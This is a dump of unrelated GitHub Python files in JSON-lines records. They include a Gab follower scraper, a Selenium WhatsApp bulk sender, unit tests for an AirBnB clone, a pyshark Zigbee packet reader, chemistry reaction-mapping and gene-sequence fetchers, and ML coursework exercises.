['farmer-general']\n\nfp = open('data.json', 'w')\n\nwhile user_count < 50000 and queue:\n\ttry:\n\t\tuser_name = queue.pop(0)\n\t\tif user_name not in visited:\n\t\t\tuser = gab.getuser(user_name)\n\t\t\tjson.dump(user, fp)\n\t\t\tuser_count += 1\n\t\t\tprint (user_count)\n\t\t\tvisited.add(user_name)\n\t\t\tfollowers = gab.getfollowers(user_name, 200)\n\t\t\tfor user in followers:\n\t\t\t\ttry:\n\t\t\t\t\tfollower_username = user['username']\n\t\t\t\t\tif follower_username not in visited:\n\t\t\t\t\t\tqueue.append(follower_username)\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\texcept:\n\t\tcontinue\nfp.close()\n","repo_name":"dheerajpreddy/GAB-Analysis","sub_path":"src/scrape_usernames.py","file_name":"scrape_usernames.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18587366653","text":"\n\nimport numpy as np\nfrom matplotlib import pyplot\nion()\nclose('all')\n\n\n\nt = np.arange(100) + np.random.normal(0, 0.05, 100)\n\nt[t>50] += 50\n\nt[30] +=1\n\n\ndeltat = median(diff(t))\n\ntp = np.roll(t,1) + deltat\ntm = np.roll(t,-1) - deltat\n\n\ntnorm = median(column_stack((tp, t, tm)), axis=-1)\n\nfigure()\nplot(tnorm, t-tnorm)\n\nfigure()\nplot(diff(tnorm))","repo_name":"INRIM/tintervals","sub_path":"tests/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"26344022073","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom functools import partial\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom openpyxl import load_workbook, cell\r\nimport time\r\nimport sys\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport time\r\nimport sys\r\nfrom tkinter import filedialog\r\n \r\ntop = Tk()\r\ntop.title(\"WhatsApp Application\")\r\n\r\ntop.geometry(\"600x400\")\r\nunsaved_Contacts = []\r\nfilename=\"\"\r\n\r\ndef openfile():\r\n filename=filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"Excel file\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n messagebox.showinfo(\"Hello\", filename)\r\n workbook = load_workbook(filename)\r\n sheet = workbook[\"contact\"]\r\n for cell in sheet['A']:\r\n target = cell.value\r\n\r\n unsaved_Contacts.append(target)\r\n return\r\n\r\n \r\ndef sendno(s1,s2):\r\n str1 = (s1.get()) \r\n str2 = (s2.get())\r\n message = str1\r\n target = str2\r\n link = \"https://wa.me/\" + str2\r\n chrome_options = Options()\r\n chrome_options.add_argument('--user-data-dir=./User_Data')\r\n driver = webdriver.Chrome(options=chrome_options)\r\n wait = WebDriverWait(driver, 600)\r\n driver.get(link)\r\n driver.maximize_window()\r\n print(\"QR scanned\")\r\n try:\r\n time.sleep(20)\r\n input_box = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\r\n for ch in message:\r\n if ch == \"\\n\":\r\n ActionChains(browser).key_down(Keys.SHIFT).key_down(Keys.ENTER).key_up(Keys.ENTER).key_up(Keys.SHIFT).key_up(Keys.BACKSPACE).perform()\r\n else:\r\n input_box.send_keys(ch)\r\n input_box.send_keys(Keys.ENTER)\r\n print(\"Message sent successfuly\")\r\n except NoSuchElementException:\r\n print(\"Failed to send message\")\r\n driver.close()\r\n return\r\n\r\ndef sendcon(s1,s3):\r\n str1 = (s1.get()) \r\n str3 = (s3.get())\r\n message = str1\r\n target= '\"' + str3 + '\"'\r\n link = \"https://web.whatsapp.com/\"\r\n chrome_options = Options()\r\n chrome_options.add_argument('--user-data-dir=./User_Data')\r\n driver = webdriver.Chrome(options=chrome_options)\r\n wait = WebDriverWait(driver, 600)\r\n driver.get(link)\r\n driver.maximize_window()\r\n print(\"QR scanned\")\r\n print(target)\r\n try:\r\n x_arg = '//span[contains(@title,' + target + ')]'\r\n try:\r\n time.sleep(20)\r\n group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))\r\n group_title.click()\r\n except:\r\n print(\"contact not found\")\r\n time.sleep(4)\r\n input_box = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\r\n input_box.send_keys(str1)\r\n input_box.send_keys(Keys.ENTER)\r\n print(\"Message sent successfuly\")\r\n time.sleep(1)\r\n except NoSuchElementException:\r\n return\r\n driver.close()\r\n return\r\n\r\ndef sendall(s1): \r\n str1 = (s1.get())\r\n for i in unsaved_Contacts:\r\n message=str1\r\n link = \"https://wa.me/\" + str(i)\r\n chrome_options = Options()\r\n chrome_options.add_argument('--user-data-dir=./User_Data')\r\n driver = webdriver.Chrome(options=chrome_options)\r\n wait = WebDriverWait(driver, 600)\r\n driver.get(link)\r\n driver.maximize_window()\r\n print(\"QR scanned\")\r\n try:\r\n time.sleep(20)\r\n input_box = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')[0]\r\n for ch in message:\r\n if ch == \"\\n\":\r\n ActionChains(browser).key_down(Keys.SHIFT).key_down(Keys.ENTER).key_up(Keys.ENTER).key_up(Keys.SHIFT).key_up(Keys.BACKSPACE).perform()\r\n else:\r\n input_box.send_keys(ch)\r\n input_box.send_keys(Keys.ENTER)\r\n print(\"Message sent successfuly\")\r\n except NoSuchElementException:\r\n print(\"Failed to send message\")\r\n driver.close()\r\n return\r\n\r\nstring1 = StringVar() \r\nstring2 = StringVar()\r\nstring3 = StringVar()\r\n\r\nmno = Label(top, text = \"Enter Message\").place(x = 30,y = 50)\r\nmsg = Label(top, text = \"Enter Mobile No(91xxxxxxxxxx)\").place(x = 30, y = 90)\r\nrule = Label(top, text = \"Mobile no should have prefix of country code e.g. 91 for India\").place(x = 30, y = 130)\r\ncname = Label(top, text = \"Enter Contact Name\").place(x = 30, y = 170)\r\nques = Label(top, text = \"Want to send to multiple mobile numbers?? If yes, then\").place(x = 30, y = 210)\r\nfileup = Label(top, text = \"Select file(.xlsx) to upload\").place(x = 30, y = 250)\r\nquitapp = Label(top, text = \"Click on QUIT to cancel the App\").place(x = 30, y = 290)\r\n\r\n\r\ntxt1 = Entry(top,textvariable=string1).place(x = 250, y = 50) \r\ntxt2 = Entry(top,textvariable=string2).place(x = 250, y = 90)\r\ntxt3 = Entry(top,textvariable=string3).place(x = 250, y = 170)\r\n\r\nsendno = partial(sendno, string1, string2)\r\nsendcon = partial(sendcon, string1, string3)\r\nsendall = partial(sendall, string1)\r\n\r\nsendtono = Button(top, text = \"Send to Number\",command = sendno,activebackground = \"green\", activeforeground = \"white\").place(x =400, y = 90)\r\nsendtocon = Button(top, text = \"Send to Contact\",command = sendcon,activebackground = \"green\", activeforeground = \"white\").place(x = 400, y = 170)\r\nsendtoall = Button(top, text = \"Send to All\",command = sendall,activebackground = \"green\", activeforeground = \"white\").place(x = 400, y = 250)\r\nselbtn = Button(top, text = \"Select File\",command = openfile,activebackground = \"green\", activeforeground = \"white\").place(x = 250, y = 250)\r\ncancelbtn = Button(top, text = \"QUIT\",command = top.destroy,activebackground = \"green\", activeforeground = \"white\").place(x = 250, y = 290)\r\n \r\ntop.mainloop() \r\n","repo_name":"Shagufta38/Whatsapp_GUI","sub_path":"whatsapp_gui_working.py","file_name":"whatsapp_gui_working.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35068571559","text":"#!/usr/bin/python3\r\n\"\"\"Init models/review.py unittests.\r\nUnittest classes:\r\n TestReview_instantiation\r\n TestReview_save\r\n TestReview_to_dict\r\n\"\"\"\r\nimport os\r\nimport models\r\nimport unittest\r\nfrom datetime import datetime\r\nfrom time import sleep\r\nfrom models.review import Review\r\n\r\nglobal sleep_tm\r\nsleep_tm = 0.05\r\n\r\n\r\nclass TestReview_instantiation(unittest.TestCase):\r\n \"\"\"Unittests instantiation\"\"\"\r\n\r\n def test_no_args_instantiates(self):\r\n self.assertEqual(Review, type(Review()))\r\n\r\n def test_new_instance_stored_in_objects(self):\r\n self.assertIn(Review(), models.storage.all().values())\r\n\r\n def test_id_is_public_str(self):\r\n self.assertEqual(str, type(Review().id))\r\n\r\n def test_created_at_is_public_datetime(self):\r\n self.assertEqual(datetime, type(Review().created_at))\r\n\r\n def test_updated_at_is_public_datetime(self):\r\n self.assertEqual(datetime, type(Review().updated_at))\r\n\r\n def test_place_id_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.place_id))\r\n self.assertIn(\"place_id\", dir(reviewModel))\r\n self.assertNotIn(\"place_id\", reviewModel.__dict__)\r\n\r\n def test_user_id_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.user_id))\r\n self.assertIn(\"user_id\", dir(reviewModel))\r\n self.assertNotIn(\"user_id\", reviewModel.__dict__)\r\n\r\n def test_text_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.text))\r\n self.assertIn(\"text\", dir(reviewModel))\r\n self.assertNotIn(\"text\", reviewModel.__dict__)\r\n\r\n def test_two_reviews_unique_ids(self):\r\n reviewModel1 = Review()\r\n reviewModel2 = Review()\r\n self.assertNotEqual(reviewModel1.id, reviewModel2.id)\r\n\r\n def test_two_reviews_different_created_at(self):\r\n reviewModel1 = Review()\r\n sleep(sleep_tm)\r\n reviewModel2 = Review()\r\n self.assertLess(reviewModel1.created_at, reviewModel2.created_at)\r\n\r\n def test_two_reviews_different_updated_at(self):\r\n reviewModel1 = Review()\r\n sleep(sleep_tm)\r\n reviewModel2 = Review()\r\n self.assertLess(reviewModel1.updated_at, reviewModel2.updated_at)\r\n\r\n def test_str_representation(self):\r\n date_today = datetime.today()\r\n dateToday_repr = repr(date_today)\r\n reviewModel = Review()\r\n reviewModel.id = \"123456\"\r\n reviewModel.created_at = reviewModel.updated_at = date_today\r\n review_str = reviewModel.__str__()\r\n self.assertIn(\"[Review] (123456)\", review_str)\r\n self.assertIn(\"'id': '123456'\", review_str)\r\n self.assertIn(\"'created_at': \" + dateToday_repr, review_str)\r\n self.assertIn(\"'updated_at': \" + dateToday_repr, review_str)\r\n\r\n def test_args_unused(self):\r\n reviewModel = Review(None)\r\n self.assertNotIn(None, reviewModel.__dict__.values())\r\n\r\n def test_instantiation_with_kwargs(self):\r\n date_today = datetime.today()\r\n today_ios = date_today.isoformat()\r\n reviewModel = Review(\r\n id=\"345\", created_at=today_ios, updated_at=today_ios)\r\n self.assertEqual(reviewModel.id, \"345\")\r\n self.assertEqual(reviewModel.created_at, date_today)\r\n self.assertEqual(reviewModel.updated_at, date_today)\r\n\r\n def test_instantiation_with_None_kwargs(self):\r\n with self.assertRaises(TypeError):\r\n Review(id=None, created_at=None, updated_at=None)\r\n\r\n\r\nclass TestReview_save(unittest.TestCase):\r\n \"\"\"Unittests save method\"\"\"\r\n\r\n @classmethod\r\n def setUp(self):\r\n try:\r\n os.rename(\"file.json\", \"tmp\")\r\n except IOError:\r\n pass\r\n\r\n def tearDown(self):\r\n try:\r\n os.remove(\"file.json\")\r\n except IOError:\r\n pass\r\n try:\r\n os.rename(\"tmp\", \"file.json\")\r\n except IOError:\r\n pass\r\n\r\n def test_one_save(self):\r\n reviewModel = Review()\r\n sleep(sleep_tm)\r\n fst_updated_at = reviewModel.updated_at\r\n reviewModel.save()\r\n self.assertLess(fst_updated_at, reviewModel.updated_at)\r\n\r\n def test_two_saves(self):\r\n reviewModel = Review()\r\n sleep(sleep_tm)\r\n fst_updated_at = reviewModel.updated_at\r\n reviewModel.save()\r\n scd_updated_at = reviewModel.updated_at\r\n self.assertLess(fst_updated_at, scd_updated_at)\r\n sleep(sleep_tm)\r\n reviewModel.save()\r\n self.assertLess(scd_updated_at, reviewModel.updated_at)\r\n\r\n def test_save_with_arg(self):\r\n reviewModel = Review()\r\n with self.assertRaises(TypeError):\r\n reviewModel.save(None)\r\n\r\n def test_save_updates_file(self):\r\n reviewModel = Review()\r\n reviewModel.save()\r\n rvid = \"Review.\" + reviewModel.id\r\n with open(\"file.json\", \"r\") as f:\r\n self.assertIn(rvid, f.read())\r\n\r\n\r\nclass TestReview_to_dict(unittest.TestCase):\r\n \"\"\"Unittests to_dict method\"\"\"\r\n\r\n def test_to_dict_type(self):\r\n self.assertTrue(dict, type(Review().to_dict()))\r\n\r\n def test_to_dict_contains_correct_keys(self):\r\n reviewModel = Review()\r\n self.assertIn(\"id\", reviewModel.to_dict())\r\n self.assertIn(\"created_at\", reviewModel.to_dict())\r\n self.assertIn(\"updated_at\", reviewModel.to_dict())\r\n self.assertIn(\"__class__\", reviewModel.to_dict())\r\n\r\n def test_to_dict_contains_added_attributes(self):\r\n reviewModel = Review()\r\n reviewModel.middle_name = \"Airbanb\"\r\n reviewModel.my_number = 98\r\n self.assertEqual(\"Airbanb\", reviewModel.middle_name)\r\n self.assertIn(\"my_number\", reviewModel.to_dict())\r\n\r\n def test_to_dict_datetime_attributes_are_strs(self):\r\n reviewModel = Review()\r\n review_dictn = reviewModel.to_dict()\r\n self.assertEqual(str, type(review_dictn[\"id\"]))\r\n self.assertEqual(str, type(review_dictn[\"created_at\"]))\r\n self.assertEqual(str, type(review_dictn[\"updated_at\"]))\r\n\r\n def test_to_dict_output(self):\r\n date_today = datetime.today()\r\n reviewModel = Review()\r\n reviewModel.id = \"123456\"\r\n reviewModel.created_at = reviewModel.updated_at = date_today\r\n tdict = {\r\n 'id': '123456',\r\n '__class__': 'Review',\r\n 'created_at': date_today.isoformat(),\r\n 'updated_at': date_today.isoformat(),\r\n }\r\n self.assertDictEqual(reviewModel.to_dict(), tdict)\r\n\r\n def test_contrast_to_dict_dunder_dict(self):\r\n reviewModel = Review()\r\n self.assertNotEqual(reviewModel.to_dict(), reviewModel.__dict__)\r\n\r\n def test_to_dict_with_arg(self):\r\n reviewModel = Review()\r\n with self.assertRaises(TypeError):\r\n reviewModel.to_dict(None)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"Kwenziwa/AirBnB_clone","sub_path":"tests/test_models/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17050849410","text":"from spacy.tokens import Doc, Span\n\n# Data Example\ndata = {\n \"words\": [\"Hello\", \"world\", \"!\"],\n \"spaces\":[True, False, False],\n \n \"spans\":[\n {\"label\":\"GREETING\", \"index\":(0, 2)}\n ]\n}\n\n# Document\ndef DocumentCreate(nlp: object, data: dict) -> object:\n # doc\n doc = Doc(nlp.vocab, words=data[\"words\"], spaces=data[\"spaces\"])\n\n # spans\n for s in data[\"spans\"]:\n span = Span(doc, s[\"index\"][0], s[\"index\"][1], label=s[\"label\"])\n doc.ents = [span]\n\n return doc","repo_name":"LNMMusic/nlp","sub_path":"app/handlers/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38484901217","text":"class Solution:\n def largestPerimeter(self, A: List[int]) -> int:\n perimeter = 0\n A.sort()\n A.reverse()\n i=0\n j=1\n k=2\n for i in range(len(A)):\n if(jA[k]) and (A[i]+A[k]>A[j]) and (A[k]+A[j]>A[i])):\n if(A[i]+A[j]+A[k] >= perimeter):\n perimeter =A[i]+A[j]+A[k]\n j+=1\n k+=1 \n return perimeter\n","repo_name":"NahusenayH/ComptetiveProgramming","sub_path":"take1/D6/largestPerimeter.py","file_name":"largestPerimeter.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"584000888","text":"import sys\r\ntmp_in = sys.stdin #созраняем ссылку на sys.stdin\r\nf = open(r\"file.txt\", \"r\") #файл открыт на чтение\r\nsys.stdin = f #перенаправляем ввод\r\n\r\nwhile True:\r\n try:\r\n line = input() #читаем сроку из файла\r\n print(line) #выводим строку\r\n except EOFError: #если достигнут конец файла\r\n break #выходим из цикла\r\nsys.stdin = tmp_in #восстан стандартный ввод\r\nf.close()\r\n\r\n","repo_name":"codekalser/PyQt5-Educational-Listings-","sub_path":"Prohorenok_ex31_Перенаправление потока ввода.py","file_name":"Prohorenok_ex31_Перенаправление потока ввода.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37326522587","text":"import tkinter as tk\n\ndef update_button_texts():\n with open('button_data.txt', 'r') as file:\n button_texts = file.readlines()\n button_texts = [text.strip() for text in button_texts]\n for i in range(5):\n buttons[i].config(text=button_texts[i])\n\ndef button_click(index):\n print(buttons[index]['text'])\n\nroot = tk.Tk()\nroot.title(\"Button GUI\")\n\n# Array of buttons\nbuttons = []\n\nfor i in range(5):\n button = tk.Button(root, text='Button ' + str(i+1), command=lambda index=i: button_click(index))\n button.pack()\n buttons.append(button)\n\n# Update button texts initially\nupdate_button_texts()\n\n# Function to update button texts periodically\ndef update_periodically():\n update_button_texts()\n root.after(1000, update_periodically) # Update every 1 second (adjust as needed)\n\n# Start updating button texts periodically\nupdate_periodically()\n\nroot.mainloop()\n","repo_name":"D3vq/ASL-sign-to-text","sub_path":"q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14705088712","text":"import logging\nfrom typing import List\n\nfrom rxnmapper import RXNMapper # noqa\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef map_reactions(mapper: RXNMapper, reactions: List[str]) -> List[str]:\n \"\"\"Map multiple reaction SMILES.\n This function may raise exceptions, typically if the number of tokens is\n larger than 512.\"\"\"\n chunk_results = mapper.get_attention_guided_atom_maps(\n reactions, canonicalize_rxns=True\n )\n resulting_smiles = [result[\"mapped_rxn\"] for result in chunk_results]\n return resulting_smiles\n\n\ndef map_reactions_with_error_handling(\n mapper: RXNMapper, reactions: List[str]\n) -> List[str]:\n \"\"\"\n Map multiple reaction SMILES.\n When there is an error, the reactions will be mapped one by one, and the\n one causing the error will be replaced by an empty reaction, \">>\".\n \"\"\"\n try:\n return map_reactions(mapper, reactions)\n except Exception:\n logger.warning(\n f\"Error while mapping chunk of {len(reactions)} reactions. \"\n \"Mapping them individually.\"\n )\n\n mapped_reactions = []\n for reaction in reactions:\n try:\n mapped_reaction = map_reactions(mapper, [reaction])[0]\n except Exception as e:\n logger.info(\n f\"Reaction causing the error: {reaction}; \"\n f\"{e.__class__.__name__}: {e}\"\n )\n mapped_reaction = \">>\"\n mapped_reactions.append(mapped_reaction)\n return mapped_reactions\n","repo_name":"rxn4chemistry/disconnection_aware_retrosynthesis","sub_path":"src/dar/aam.py","file_name":"aam.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"76"} +{"seq_id":"8076326077","text":"import pyshark\n\ndef print_all_packets(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n for packet in capture:\n print(packet)\n\nif __name__ == \"__main__\":\n pcap_file_path = \"ieee802154_on.pcap\"\n print_all_packets(pcap_file_path)\n \n \n \"\"\"\n \n import logging\nlogging.basicConfig(level=logging.DEBUG)\nimport pyshark\nimport sys\n\n\ndef delve_into_zigbee_communication(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path, display_filter=\"wpan\")\n zigbee_packets = []\n\n for packet in capture:\n if hasattr(packet, \"wpan\") and hasattr(packet.wpan, \"zigbee\"):\n zigbee_packets.append(packet)\n logging.debug(f\"Captured Zigbee packet: {packet}\")\n\n capture.close()\n return zigbee_packets\n\ndef find_network_key(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee') and hasattr(packet.wpan.zigbee, 'nwk_key_descriptor'):\n return packet.wpan.zigbee.nwk_key_descriptor.network_key\n\n return None\n\ndef find_transport_key(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee') and hasattr(packet.wpan.zigbee, 'sec') and hasattr(packet.wpan.zigbee.sec, 'nwk_fc'):\n if int(packet.wpan.zigbee.sec.nwk_fc, 16) & 0b10:\n return packet.wpan.zigbee.sec.security_key\n\n return None\n\n\ndef count_zigbee_packets(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n zigbee_count = 0\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee'):\n zigbee_count += 1\n\n return zigbee_count\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python3 key.py \")\n sys.exit(1)\n\n pcap_file_path = sys.argv[1]\n delve_into_zigbee_communication(pcap_file_path)\n network_key = find_network_key(pcap_file_path)\n transport_key = find_transport_key(pcap_file_path)\n total_zigbee_packets = count_zigbee_packets(pcap_file_path)\n\n print(f\"Network Key: {network_key}\")\n print(f\"Transport Key: {transport_key}\")\n print(f\"Total Zigbee packets in the capture: {total_zigbee_packets}\")\n\n\n \n \"\"\"\n","repo_name":"ashok5141/Zigbee_Security","sub_path":"Capture and Analysis/Packets.py","file_name":"Packets.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"21899356587","text":"import requests\nfrom bs4 import BeautifulSoup\nimport subprocess\nfrom Bio import SeqIO\nfrom io import StringIO\nimport json\nimport numpy as np\nimport time\n\n\nwith open(\"/home/users/nus/e0969999/scratch/data/myfile.json\", \"r\") as file:\n trf_data = json.load(file)\n\nwith open(\"/home/users/nus/e0969999/scratch/data/ncbi_dict.json\",\"r\") as file:\n ncbi_data = json.load(file)\n\n# Counter variables\nmirbase_counter = 0\nensembl_counter = 0\nsequences_per_sleep = 1000 \n\ndef getMIRBaseSeq(id):\n global mirbase_counter\n id = id.replace('miRBase:', '')\n URL = \"https://www.mirbase.org/mature/\" + id\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n sequence_td = soup.find('td', class_='row-title', text='Sequence')\n if sequence_td is None:\n return np.nan\n else:\n sequence = sequence_td.find_next_sibling('td').text.strip()\n mirbase_counter += 1\n if mirbase_counter % sequences_per_sleep == 0:\n time.sleep(5) \n return sequence\n\ndef getTRFdbSeq(id):\n id = id.replace('tRF-','')\n return trf_data.get(id, np.nan)\n\ndef getNCBISeq(id):\n id = id.replace('NCBI:', '')\n return ncbi_data.get(id, np.nan)\n \n '''\n command = f\"echo '{gene_id}' | source /home/users/nus/e0969999/scratch/ncbi.sh\"\n\n try:\n output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, text=True)\n output_file = StringIO(output)\n records = list(SeqIO.parse(output_file, \"fasta\"))\n if records:\n dna_sequence = str(records[0].seq)\n return dna_sequence\n else:\n return np.nan\n except subprocess.CalledProcessError as e:\n # Handle any errors that occur during script execution\n print(\"Error executing the script:\", e)\n '''\ndef getEnsemblSeq(id):\n global ensembl_counter\n id = id.replace('Ensembl:','')\n human = \"ENSG\"\n if human in id:\n server = \"https://rest.ensembl.org\"\n ext = \"/sequence/id/\" + id + \"?\"\n r = requests.get(server+ext, headers={ \"Content-Type\" : \"text/plain\"})\n ensembl_counter += 1\n if ensembl_counter % sequences_per_sleep == 0:\n time.sleep(5)\n return r.text\n else:\n return np.nan\n\ndef main():\n print(\"MIRNA:\" + getMIRBaseSeq('miRBase:MIMAT0000254'))\n print(\"tRF:\" + getTRFdbSeq('tRF-3001b'))\n print(\"NCBI:\" + getNCBISeq('NCBI:7291'))\n print(\"Ensembl:\" + getEnsemblSeq('Ensembl:ENSG00000266035'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"R-Laksh/criGEM-NUS2023","sub_path":"ml models/GetSequences.py","file_name":"GetSequences.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"732141884","text":"from django.conf.urls import url, include\nfrom crud.views import home, estudiante_edit, estudiante_view, estudiante_delete\n#estudiante_view, estudiante_edit\n\n\nurlpatterns = [\n\turl(r'^nuevo$', estudiante_view, name='estudiante_crear'),\n\turl(r'^editar/([0-9]+)/$', estudiante_edit, name='estudiante_editar'),\n\turl(r'^eliminar/([0-9]+)/$',estudiante_delete, name='estudiante_eliminar'),\n]","repo_name":"luissalgado9/estudiantes","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16312804937","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Lasso,LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics.regression import r2_score\nfrom sklearn.tree import DecisionTreeClassifier\n#from adspy_shared_utilities import plot_feature_importances\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import validation_curve\n\nnp.random.seed(0)\nn = 15\nx = np.linspace(0,10,n) + np.random.randn(n)/5\ny = np.sin(x)+x/6 + np.random.randn(n)/10\n\n\nX_train, X_test, y_train, y_test = train_test_split(x, y, random_state=0)\n\n# You can use this function to help you visualize the dataset by\n# plotting a scatterplot of the data points\n# in the training and test sets.\ndef part1_scatter():\n plt.figure()\n plt.scatter(X_train, y_train, label='training data')\n plt.scatter(X_test, y_test, label='test data')\n plt.legend(loc=4);\n\n\n# NOTE: Uncomment the function below to visualize the data, but be sure\n# to **re-comment it before submitting this assignment to the autograder**.\n#part1_scatter()\n\nx=x.reshape(-1,1)\ndef answer_one():\n a=[]\n for i in [1,3,6,9]:\n poly = PolynomialFeatures(degree=i)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,\n random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n\n pred_data=np.linspace(0,10,100)\n pred_data=pred_data.reshape(-1,1)\n pred=linreg.predict(poly.fit_transform((pred_data)))\n a.append(pred)\n a=np.array(a)\n return a\n\nanswer_one()\n\n# feel free to use the function plot_one() to replicate the figure\n# from the prompt once you have completed question one\ndef plot_one(degree_predictions):\n plt.figure(figsize=(10,5))\n plt.plot(X_train, y_train, 'o', label='training data', markersize=10)\n plt.plot(X_test, y_test, 'o', label='test data', markersize=10)\n for i,degree in enumerate([1,3,6,9]):\n plt.plot(np.linspace(0,10,100), degree_predictions[i], alpha=0.8, lw=2, label='degree={}'.format(degree))\n plt.ylim(-1,2.5)\n plt.legend(loc=4)\n plt.show()\n\n#plot_one(answer_one())\n\ndef answer_two():\n r2_train=[]\n r2_test=[]\n for i in range(0,10):\n poly = PolynomialFeatures(degree=i)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,\n random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n r2_train.append(linreg.score(X_train,y_train))\n r2_test.append(linreg.score(X_test,y_test))\n r2_test=np.array(r2_test)\n r2_train=np.array(r2_train)\n return (r2_train,r2_test)\nanswer_two()\n\ndef answer_three():\n r2_train,r2_test=answer_two()\n return (3,9,7)\nanswer_three()\n\ndef answer_four():\n poly = PolynomialFeatures(degree=12)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n r2_test1=linreg.score(X_test,y_test)\n\n poly = PolynomialFeatures(degree=12)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,random_state = 0)\n linreg1 = Lasso(alpha=0.01,max_iter=10000).fit(X_train,y_train)\n r2_test2=linreg1.score(X_test,y_test)\n return (r2_test1,r2_test2)\nanswer_four()\n\nmush_df = pd.read_csv('mushrooms.csv')\nmush_df2 = pd.get_dummies(mush_df)\n\nX_mush = mush_df2.iloc[:,2:]\ny_mush = mush_df2.iloc[:,1]\n\n# use the variables X_train2, y_train2 for Question 5\nX_train2, X_test2, y_train2, y_test2 = train_test_split(X_mush, y_mush, random_state=0)\n\n# For performance reasons in Questions 6 and 7, we will create a smaller version of the\n# entire mushroom dataset for use in those questions. For simplicity we'll just re-use\n# the 25% test split created above as the representative subset.\n#\n# Use the variables X_subset, y_subset for Questions 6 and 7.\nX_subset = X_test2\ny_subset = y_test2\n\ndef answer_five():\n clf=DecisionTreeClassifier(random_state=0).fit(X_train2,y_train2)\n importance = pd.Series(clf.feature_importances_, index=X_train2.columns)\n importance=importance.sort_values(ascending=False)\n a=importance.iloc[0:5].index.tolist()\n return a\nanswer_five()\n\ndef answer_six():\n param_range = np.logspace(-4, 1, 6)\n train_scores, test_scores = validation_curve(SVC(kernel='rbf',C=1), X_subset, y_subset,param_name='gamma',param_range=param_range, cv=3)\n train_scores=np.mean(train_scores,axis=1)\n test_scores=np.mean(test_scores,axis=1)\n return 